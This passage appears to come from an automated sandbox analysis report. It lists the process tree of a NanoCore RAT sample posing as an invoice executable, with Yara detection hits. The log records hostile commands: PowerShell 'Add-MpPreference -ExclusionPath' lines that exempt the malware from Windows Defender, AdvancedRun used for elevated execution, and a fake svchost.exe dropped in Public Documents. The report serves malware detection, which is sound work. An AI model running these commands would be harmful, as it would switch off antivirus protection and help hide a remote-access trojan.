                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff724c50000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:30:45
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                Imagebase:0x400000
                                                                                                File size:91000 bytes
                                                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 3%, Metadefender, Browse
                                                                                                • Detection: 0%, ReversingLabs
                                                                                                Reputation:moderate

                                                                                                General

                                                                                                Start time:15:30:47
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /SpecialRun 4101d8 744
                                                                                                Imagebase:0x400000
                                                                                                File size:91000 bytes
                                                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate

                                                                                                General

                                                                                                Start time:15:30:52
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\explorer.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
                                                                                                Imagebase:0x7ff6fee60000
                                                                                                File size:3933184 bytes
                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:30:54
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\explorer.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                Imagebase:0x7ff6fee60000
                                                                                                File size:3933184 bytes
                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:30:53
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
                                                                                                Imagebase:0x20000
                                                                                                File size:430592 bytes
                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:30:54
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff724c50000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:30:54
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                                                Imagebase:0x11d0000
                                                                                                File size:232960 bytes
                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:30:54
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff724c50000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:15:30:55
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:timeout 1
                                                                                                Imagebase:0x1250000
                                                                                                File size:26112 bytes
                                                                                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:30:55
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
                                                                                                Imagebase:0x630000
                                                                                                File size:634024 bytes
                                                                                                MD5 hash:E9CD061B2286D8098153C9D9E2ED0B4B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 27%, ReversingLabs

                                                                                                General

                                                                                                Start time:15:30:56
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                Imagebase:0x7ff6eb840000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:31:01
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\explorer.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
                                                                                                Imagebase:0x7ff6fee60000
                                                                                                File size:3933184 bytes
                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:31:03
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\explorer.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                Imagebase:0x7ff6fee60000
                                                                                                File size:3933184 bytes
                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:31:03
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                Imagebase:0x7ff6eb840000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:31:05
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
                                                                                                Imagebase:0xf20000
                                                                                                File size:634024 bytes
                                                                                                MD5 hash:E9CD061B2286D8098153C9D9E2ED0B4B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: NanoCore, Description: unknown, Source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                                                                                                General

                                                                                                Start time:15:31:07
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                                                                                                Imagebase:0x3c0000
                                                                                                File size:107624 bytes
                                                                                                MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:31:08
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                                                                                                Imagebase:0xe0000
                                                                                                File size:107624 bytes
                                                                                                MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:31:08
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                                                                                                Imagebase:0xa10000
                                                                                                File size:107624 bytes
                                                                                                MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.948080441.0000000003121000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: NanoCore, Description: unknown, Source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000002.956836071.0000000005460000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000019.00000002.956836071.0000000005460000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: NanoCore, Description: unknown, Source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                                                                                                General

                                                                                                Start time:15:31:09
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                Imagebase:0x7ff6eb840000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:31:10
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6200 -ip 6200
                                                                                                Imagebase:0x12e0000
                                                                                                File size:434592 bytes
                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:31:11
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 2152
                                                                                                Imagebase:0x12e0000
                                                                                                File size:434592 bytes
                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                General

                                                                                                Start time:15:31:15
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                Imagebase:0x7ff6eb840000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:31:29
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                Imagebase:0x7ff6eb840000
                                                                                                File size:51288 bytes
                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                General

                                                                                                Start time:15:32:30
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
                                                                                                Imagebase:0x20000
                                                                                                File size:430592 bytes
                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET

                                                                                                General

                                                                                                Start time:15:32:30
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff724c50000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language

                                                                                                Disassembly

                                                                                                Code Analysis

                                                                                                Reset < >